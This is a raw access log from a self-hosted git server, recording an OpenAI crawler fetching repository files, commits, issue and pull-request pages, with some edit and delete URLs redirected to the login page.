"/windpacer/windpacer/src/branch/main/GoldMonitor/ReadMe.md?display=source" [Client 74.7.227.38] [Length 12783] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/ReadMe.md" +[17/Feb/2026:17:57:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/assets_data.csv?display=rendered" [Client 74.7.227.38] [Length 11337] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/assets_data.csv" +[17/Feb/2026:17:57:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PythonTest/my_database.db?display=rendered" [Client 74.7.227.38] [Length 11085] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PythonTest/my_database.db" +[17/Feb/2026:17:57:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8?files=C%2b%2bProject%2findustrial-comm%2fsrc-old%2fWRONG-DESIGNED-log_macros.hpp" [Client 74.7.227.38] [Length 23099] [Gzip 3.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" +[17/Feb/2026:17:57:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 9993] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:17:57:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/cpp/libcomm_core.so?display=rendered" [Client 74.7.227.38] [Length 10983] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/cpp/libcomm_core.so" +[17/Feb/2026:17:57:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&milestone=-1&state=open&type=all" [Client 74.7.227.38] [Length 9965] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:17:57:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&milestone=-1&state=closed&type=all" [Client 74.7.227.38] [Length 9982] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:17:57:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/libcomm_core.so?display=rendered" [Client 74.7.227.38] [Length 11023] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/libcomm_core.so" +[17/Feb/2026:17:57:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/libcomm_core.so?display=rendered" [Client 74.7.227.38] [Length 11021] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/libcomm_core.so" +[17/Feb/2026:17:57:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/data_format.hpp?display=source" [Client 74.7.227.38] [Length 12060] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/data_format.hpp" +[17/Feb/2026:17:57:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/cpp/include/data_format.hpp?display=source" [Client 74.7.227.38] [Length 12059] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/cpp/include/data_format.hpp" +[17/Feb/2026:17:57:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/data_format.hpp?display=source" [Client 74.7.227.38] [Length 12060] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/data_format.hpp" +[17/Feb/2026:17:57:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/Makefile?display=source" [Client 74.7.227.38] [Length 17051] [Gzip 5.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/Makefile" +[17/Feb/2026:17:57:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/Makefile?display=source" [Client 74.7.227.38] [Length 17027] [Gzip 5.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/Makefile" +[17/Feb/2026:17:57:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10009] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:17:57:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/Makefile?display=rendered" [Client 74.7.227.38] [Length 11073] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/Makefile" +[17/Feb/2026:17:57:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/Makefile?display=rendered" [Client 74.7.227.38] [Length 11072] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/Makefile" +[17/Feb/2026:17:57:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/Makefile?display=rendered" [Client 74.7.227.38] [Length 11072] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/Makefile" +[17/Feb/2026:17:57:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/Makefile?display=source" [Client 74.7.227.38] [Length 17051] [Gzip 5.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/Makefile" +[17/Feb/2026:17:57:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/Makefile?display=rendered" [Client 74.7.227.38] [Length 11042] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/Makefile" +[17/Feb/2026:17:57:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 26360] [Gzip 11.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:17:57:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/base_library.zip?display=rendered" [Client 74.7.227.38] [Length 10936] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/base_library.zip" +[17/Feb/2026:17:57:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/base_library.zip?display=rendered" [Client 74.7.227.38] [Length 10956] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/base_library.zip" +[17/Feb/2026:17:57:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/rss/branch/main/asset_pilot_docker/.venv/bin/activate.fish" [Client 74.7.227.38] [Length 969] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/activate.fish" +[17/Feb/2026:17:57:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/uvicorn" [Client 74.7.227.38] [Length 11754] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin" +[17/Feb/2026:17:57:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&milestone=-1&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 10149] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:17:57:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&milestone=-1&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 10157] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:17:57:43 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresWatchdog/.vscode/tasks.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/.vscode/tasks.json" +[17/Feb/2026:17:57:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresWatchdog/.vscode/tasks.json" +[17/Feb/2026:17:57:44 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldPilot/.vscode/settings.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/.vscode/settings.json" +[17/Feb/2026:17:57:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldPilot/.vscode/settings.json" +[17/Feb/2026:17:57:44 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/PostgresWatchdog/.vscode/tasks.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresWatchdog/.vscode/tasks.json" +[17/Feb/2026:17:57:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/PostgresWatchdog/.vscode/tasks.json" +[17/Feb/2026:17:57:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&state=closed&type=all" [Client 74.7.227.38] [Length 10211] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&state=all&type=all" +[17/Feb/2026:17:57:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 9989] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" +[17/Feb/2026:17:57:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 32925] [Gzip 23.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" +[17/Feb/2026:17:57:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 22400] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" +[17/Feb/2026:17:57:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&state=closed&type=all" [Client 74.7.227.38] [Length 10023] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&state=all&type=all" +[17/Feb/2026:17:57:48 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_delete/main/asset_pilot_docker/.venv/bin/uvicorn" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/uvicorn" +[17/Feb/2026:17:57:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_delete/main/asset_pilot_docker/.venv/bin/uvicorn" +[17/Feb/2026:17:57:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10192] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:17:57:49 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_edit/main/asset_pilot_docker/.venv/bin/uvicorn" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/uvicorn" +[17/Feb/2026:17:57:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_edit/main/asset_pilot_docker/.venv/bin/uvicorn" +[17/Feb/2026:17:57:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/branch/main/asset_pilot_docker/.venv/bin/uvicorn" [Client 74.7.227.38] [Length 255] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/uvicorn" +[17/Feb/2026:17:57:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/rss/branch/main/asset_pilot_docker/.venv/bin/uvicorn" [Client 74.7.227.38] [Length 957] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/uvicorn" +[17/Feb/2026:17:57:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o?display=rendered" [Client 74.7.227.38] [Length 11025] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" +[17/Feb/2026:17:57:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10227] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&state=closed&type=all" +[17/Feb/2026:17:57:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o?display=rendered" [Client 74.7.227.38] [Length 11023] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" +[17/Feb/2026:17:57:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o?display=rendered" [Client 74.7.227.38] [Length 11024] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" +[17/Feb/2026:17:57:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2fTestProject%2fbuild%2fCMakeFiles%2fTestApp.dir%2fcmake_clean.cmake" [Client 74.7.227.38] [Length 25393] [Gzip 4.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" +[17/Feb/2026:17:57:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2fTestProject%2fbuild%2fCMakeFiles%2fTestApp.dir%2fcompiler_depend.ts" [Client 74.7.227.38] [Length 24966] [Gzip 4.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" +[17/Feb/2026:17:57:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2findustrial-comm%2fbuild%2fCMakeFiles%2f3.31.10%2fCompilerIdCXX%2fCMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 53596] [Gzip 12.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:17:57:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr 